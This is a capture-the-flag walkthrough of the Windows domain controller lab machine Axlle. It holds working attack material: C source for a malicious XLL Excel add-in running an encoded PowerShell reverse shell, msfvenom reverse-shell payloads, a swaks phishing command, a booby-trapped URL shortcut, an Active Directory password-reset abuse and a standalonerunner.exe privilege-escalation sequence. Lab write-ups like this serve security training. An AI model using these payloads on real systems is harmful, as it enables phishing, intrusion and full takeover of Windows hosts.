Week 10. Axlle

TL;DR

This is a Windows 22 Server machine that hosts a web site under development. The developers have opened an email account where the users can send their suggestions in Excel format. We leverage this to send a malicious XLL phishing email, that enables us to get a first shell in the system. To get the user flag we move laterally to another user by means of another client side attack: placing a malicious URL shortcut in a folder used by the web developers team and waiting for someone to click on it. Regarding escalation, first we move laterally to another domain user abusing a misconfiguration in the Active Directory ForceChangePassword object permission. Final escalation step to administrator is made by abusing the Windows binary standalonerunner.exe

KEYWORDS

XLL Excel, swaks, phishing, URL shortcuts, Active Directory, Bloodhound enumeration, ForceChangePassword, standalonerunner.exe.

REFERENCES

https://threatresearch.ext.hp.com/how-attackers-use-xll-malware-to-infect-systems/

https://whichbuffer.medium.com/macro-4-0-is-dead-long-live-the-xll-ae3c3a0fa697

https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#xll-exec

https://support.bloodhoundenterprise.io/hc/en-us/articles/17223286750747-ForceChangePassword

https://blog.techinline.com/2018/12/20/how-to-change-windows-password-using-command-line-or-powershell/

https://github.com/nasbench/Misc-Research/blob/main/LOLBINs/StandaloneRunner.md

ENUMERATION

Port scan.

> nmap $target -p- --min-rate=5000 -Pn --open --reason
Starting Nmap 7.93 ( https://nmap.org ) at 2024-10-09 10:34 EDT
Nmap scan report for 10.10.11.21
Host is up, received user-set (0.042s latency).
Not shown: 65513 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE          REASON
25/tcp    open  smtp             syn-ack
53/tcp    open  domain           syn-ack
80/tcp    open  http             syn-ack
88/tcp    open  kerberos-sec     syn-ack
135/tcp   open  msrpc            syn-ack
139/tcp   open  netbios-ssn      syn-ack
389/tcp   open  ldap             syn-ack
445/tcp   open  microsoft-ds     syn-ack
464/tcp   open  kpasswd5         syn-ack
593/tcp   open  http-rpc-epmap   syn-ack
636/tcp   open  ldapssl          syn-ack
3268/tcp  open  globalcatLDAP    syn-ack
3269/tcp  open  globalcatLDAPssl syn-ack
5985/tcp  open  wsman            syn-ack
9389/tcp  open  adws             syn-ack
49664/tcp open  unknown          syn-ack
59781/tcp open  unknown          syn-ack
59782/tcp open  unknown          syn-ack
59783/tcp open  unknown          syn-ack
59789/tcp open  unknown          syn-ack
59796/tcp open  unknown          syn-ack
59805/tcp open  unknown          syn-ack
 
Nmap done: 1 IP address (1 host up) scanned in 26.46 seconds

Enumerate the open ports.

> nmap $target -p25,53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -sV -sC -Pn -vv
Starting Nmap 7.93 ( https://nmap.org ) at 2024-10-09 10:46 EDT
Nmap scan report for 10.10.11.21
Host is up, received user-set (0.040s latency).
Scanned at 2024-10-09 10:46:47 EDT for 56s
 
PORT     STATE SERVICE       REASON  VERSION
25/tcp   open  smtp          syn-ack hMailServer smtpd
| smtp-commands: MAINFRAME, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
53/tcp   open  domain        syn-ack Simple DNS Plus
80/tcp   open  http          syn-ack Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-favicon: Unknown favicon MD5: FAF2C069F86E802FD21BF15DC8EDD2DC
|_http-title: Axlle Development
88/tcp   open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2024-10-09 14:47:18Z)
135/tcp  open  msrpc         syn-ack Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack
464/tcp  open  kpasswd5?     syn-ack
593/tcp  open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack
3268/tcp open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack
5985/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open  mc-nmf        syn-ack .NET Message Framing
Service Info: Host: MAINFRAME; OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results:
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 29964/tcp): CLEAN (Timeout)
|   Check 2 (port 22598/tcp): CLEAN (Timeout)
|   Check 3 (port 59572/udp): CLEAN (Timeout)
|   Check 4 (port 32412/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 25s
| smb2-security-mode:
|   311:
|_    Message signing enabled and required
| smb2-time:
|   date: 2024-10-09T14:47:29
|_  start_date: N/A
 
Nmap done: 1 IP address (1 host up) scanned in 56.75 seconds

Looks like a domain controller, add to hosts file and enumerate the web site with Firefox

They provide an email address to send email in Excel format, but they warn macros will be disabled, so we have to investigate ways to send payloads in Excel without using macros.

The answer is to use XLL payloads as explained in the following links.

https://threatresearch.ext.hp.com/how-attackers-use-xll-malware-to-infect-systems/

https://whichbuffer.medium.com/macro-4-0-is-dead-long-live-the-xll-ae3c3a0fa697

USER

Let's create an XLL payload as explained here:https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#xll-exec

In the command line we will include a base64 Powershell payload. The final C code is the following.

#include <Windows.h>
 
__declspec(dllexport) void __cdecl xlAutoOpen(void);
 
void __cdecl xlAutoOpen() {
    // Triggers when Excel opens
    WinExec("powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOQAxACIALAAxADkAMQA5ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==", 1);
}
 
BOOL APIENTRY DllMain( HMODULE hModule,
                    DWORD  ul_reason_for_call,
                    LPVOID lpReserved
                    )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

Compile as XLL file.

> x86_64-w64-mingw32-gcc -fPIC -shared -o xll.xll xll.c -luser32

And send the resulting file to the email address accounts@axlle.htb attaching the XLL payload. For this we use the swaks tool included with Kali.

> swaks --to accounts@axlle.htb --from nil@nil.com --body "hey" --header "Subject: hey" --attach @xll.xll --server axlle.htb

As reverse shell for user axlle\gideon.hamill is received on port 1919.

Use this shell to enumerate the file system contents. In the location C:\Program Files (x86)\hMailServer\Data\axlle.htb\dallon.matrix\2F, we find an email .eml file.

> cd C:\Program Files (x86)\hMailServer\Data\axlle.htb\dallon.matrix\2F
> dir
 
    Directory: C:\                                                                          
                                                 
                                                                    
Mode                 LastWriteTime         Length Name                                 
----                 -------------         ------ ----                               
d-----          1/1/2024  10:03 PM                App Development                  
d-----          1/1/2024   6:33 AM                inetpub                                     
d-----          5/8/2021   1:20 AM                PerfLogs                    
d-r---         6/13/2024   2:20 AM                Program Files                           
d-----         6/13/2024   2:23 AM                Program Files (x86)           
d-r---          1/1/2024   4:15 AM                Users                            
d-----         6/13/2024   4:30 AM                Windows                           
                                                 
                                                     
> cd "C:\Program Files (x86)\hMailServer\Data\axlle.htb\dallon.matrix\2F"
> dir
 
                                                     
    Directory: C:\Program Files (x86)\hMailServer\Data\axlle.htb\dallon.matrix\2F
                                                                                               
                                                                                           
Mode                 LastWriteTime         Length Name           
----                 -------------         ------ ----                                      
-a----          1/1/2024   6:32 AM            997 {2F7523BD-628F-4359-913E-A873FCC59D0F}.eml

Let's browse its contents.

> type *
Return-Path: webdevs@axlle.htb
Received: from bumbag (Unknown [192.168.77.153])
        by MAINFRAME with ESMTP
        ; Mon, 1 Jan 2024 06:32:24 -0800
Date: Tue, 02 Jan 2024 01:32:23 +1100
To: dallon.matrix@axlle.htb,calum.scott@axlle.htb,trent.langdon@axlle.htb,dan.kendo@axlle.htb,david.brice@axlle.htb,frankie.rose@axlle.htb,samantha.fade@axlle.htb,jess.adams@axlle.htb,emily.cook@axlle.htb,phoebe.graham@axlle.htb,matt.drew@axlle.htb,xavier.edmund@axlle.htb,baz.humphries@axlle.htb,jacob.greeny@axlle.htb
From: webdevs@axlle.htb
Subject: OSINT Application Testing
Message-Id: <20240102013223.019081@bumbag>
X-Mailer: swaks v20201014.0 jetmore.org/john/code/swaks/
 
Hi everyone,
 
The Web Dev group is doing some development to figure out the best way to automate the checking and addition of URLs into the OSINT portal.
 
We ask that you drop any web shortcuts you have into the C:\inetpub\testing folder so we can test the automation.
 
Yours in click-worthy URLs,
 
The Web Dev Team

We have discovered the Web Dev group is expecting .url web shortcut files in the C:\inetpub\testing location.

Let's create an EXE payload with msfvenom and transfer it to C:\inetpub\testing

> msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.14.91 lport=9000 -f exe -a x64 --platform windows -o shell.exe

Now create a malicious .url shortcut pointing to this payload so we receive a reverse shell every time someone from the Web Dev team opens it. We transfer the shortcut to the same location.

[InternetShortcut]
URL=C:\inetpub\testing\shell.exe

Shortly after, a reverse shell for another Web Dev user axlle\dallon.matrix is received on port 9000.

You can use it to retrieve the user flag

SYSTEM

Start from the low-priv shell and take the opportunity to enumerate the system and the current user.

> systeminfo
 
Host Name:                 MAINFRAME
OS Name:                   Microsoft Windows Server 2022 Standard
OS Version:                10.0.20348 N/A Build 20348
System Type:               x64-based PC
 
> net user dallon.matrix
User name                    dallon.matrix
Full Name                    
Comment                     
User's comment              
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never
 
Password last set            6/13/2024 1:04:25 AM
Password expires             Never
Password changeable          6/14/2024 1:04:25 AM
Password required            Yes
User may change password     Yes
 
Workstations allowed         MAINFRAME
Logon script                
User profile                
Home directory              
Last logon                   10/9/2024 9:42:37 AM
 
Logon hours allowed          All
 
Local Group Memberships     
Global Group memberships     *Web Devs             *Domain Users        
The command completed successfully.
 
> whoami /priv
 
PRIVILEGES INFORMATION
----------------------
 
Privilege Name                Description                    State  
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

There is nothing we can use for the moment. Let's do a domain enumeration with Bloodhound.

First transfer the sharphound.exe collector and gather the data.

> sharphound.exe --collectionmethods all
2024-10-09T09:57:04.0025209-07:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2024-10-09T09:57:04.1744044-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-10-09T09:57:04.2056804-07:00|INFORMATION|Initializing SharpHound at 9:57 AM on 10/9/2024
2024-10-09T09:57:04.3931446-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-10-09T09:57:04.5650426-07:00|INFORMATION|Beginning LDAP search for axlle.htb
2024-10-09T09:57:04.6118979-07:00|INFORMATION|Producer has finished, closing LDAP channel
2024-10-09T09:57:04.6118979-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-10-09T09:57:35.2838139-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 36 MB RAM
2024-10-09T09:57:48.5650122-07:00|INFORMATION|Consumers finished, closing output channel
2024-10-09T09:57:48.5962640-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-10-09T09:57:48.7681444-07:00|INFORMATION|Status: 113 objects finished (+113 2.568182)/s -- Using 44 MB RAM
2024-10-09T09:57:48.7681444-07:00|INFORMATION|Enumeration finished in 00:00:44.2115548
2024-10-09T09:57:48.8618925-07:00|INFORMATION|Saving cache with stats: 72 ID to type mappings.
 72 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2024-10-09T09:57:48.8618925-07:00|INFORMATION|SharpHound Enumeration Completed at 9:57 AM on 10/9/2024! Happy Graphing!

Transfer the resulting .zip file to Kali and ingest the data into the graph database. We see current user is member of web.devs group, which can in turn change password of user jacob.greeny

This ACL misconfiguration is explained here: https://support.bloodhoundenterprise.io/hc/en-us/articles/17223286750747-ForceChangePassword

To change the password use the procedure indicted here: https://blog.techinline.com/2018/12/20/how-to-change-windows-password-using-command-line-or-powershell/

Open a Powershell and change Jacob's password with this.

> Set-ADAccountPassword -Identity JACOB.GREENY -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "Password123!" -Force)

Then move laterally to user jacob.greeny with the recently changed password and evil-winrm

> evil-winrm -u jacob.greeny -p 'Password123!' -i axlle.htb
                                       
Evil-WinRM shell v3.5
                                       
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                       
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                       
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\jacob.greeny\Documents>

Now we can move to the C:\App Development\kbfiltr folder and inspect the README.md file.

> type README.md
# Keyboard Translation Program
This is an application in development that uses a WDF kbfiltr as the basis for a translation program. The aim of this application is to allow users to program and simulate custom keyboard layouts for real or fictional languages.
 
## Features
- Create custom keyboard layouts for real or fictional languages.
- Simulate keyboard inputs using the custom layouts.
- Secret codes to switch between languages and logging output.
 
## Progress
- kbfiltr driver - Complete
- Keyboard mapping - Complete (hardcoded in driver)
- Custom mapping in application layer - In progress
- Logging - Complete
- Activation of logging - Complete
- Simulation of other keyboard layouts - Incomplete
- Activation of other keyboard layouts - Incomplete
 
**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**
 
## Prerequisites
- Windows 10 or higher
- Visual Studio 2019
- Windows Driver Kit (WDK) 10
 
## Getting Started
- Clone this repository.
- Open the solution file in Visual Studio.
- Build the solution in Release mode.
- Install the driver by running `.\devcon.exe install .\kbfiltr.inf "*PNP0303"` as Administrator.
- Install the driver as an upperclass filter with `.\devcon.exe /r classfilter keyboard upper -keylogger` as Administrator.
- Install the application by running the install_app.bat file as Administrator.
- Reboot your computer to load the driver.
- Launch the application and start programming your custom keyboard layouts.
 
## Usage
### Programming a Custom Layout
- Launch the application.
- Click on the Program Layout button.
- Select the language for which you want to program the layout.
- Select the key you want to modify from the list.
- Modify the key's scancode and virtual key code as required.
- Repeat steps 4 and 5 for all the keys you want to modify.
- Save the layout by clicking on the Save Layout button.
 
### Simulating Inputs
- Launch the application.
- Click on the Simulate Input button.
- Select the language for which you want to simulate the input.
- Type in the input in the normal English layout.
- Trigger language switch as outlined below (when required).
- Verify that the input is translated to the selected language.
 
### Logging Output
- Launch the application.
- Turn on logging (shortcuts can be created as explained below)
- Use the application as normal.
- The log file will be created in the same directory as the application.
 
## Triggering/Activation
- To toggle logging output, set up a shortcut in the options menu. INCOMPLETE
- To switch to a different language, press the Left Alt key and the Right Ctrl key simultaneously. INCOMPLETE
 
## Bugs
There are probably several.

The author says:

**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**

This standalonerunner.exe binary is a tool for testing and debugging drivers on Windows systems.

Doing a search in Internet we find an article published by a researcher who explains how to get command execution abusing this binary.

https://github.com/nasbench/Misc-Research/blob/main/LOLBINs/StandaloneRunner.md

Let's follow the procedure explained in the last part of the article. First, create an EXE payload and transfer to the host.

> msfvenom -p windows/x64/shell_reverse_tcp lhost=<Kali IP> lport=9001 -f exe -a x64 --platform windows -o shell2.exe

Upload it with evil-winrm in the location C:\Users\jacob.greeny\Documents\shell2.exe

Now enter the sequence of commands indicated by the researcher.

> echo 'myTestDir' > "C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\reboot.rsf"
> echo 'True' >> "C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\reboot.rsf"
> mkdir "C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\myTestDir\working"
> echo '' > "C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\myTestDir\working\rsf.rsf"
> echo "C:\Users\jacob.greeny\Documents\shell2.exe" > "C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\command.txt"

The only thing that's left is to wait till someone opens the standalonerunner.exe binary. When that happens, a shell is received on port 9001

You are root.

PreviousWeek 9. Editorial NextWeek 11. PermX

Last updated 8 months ago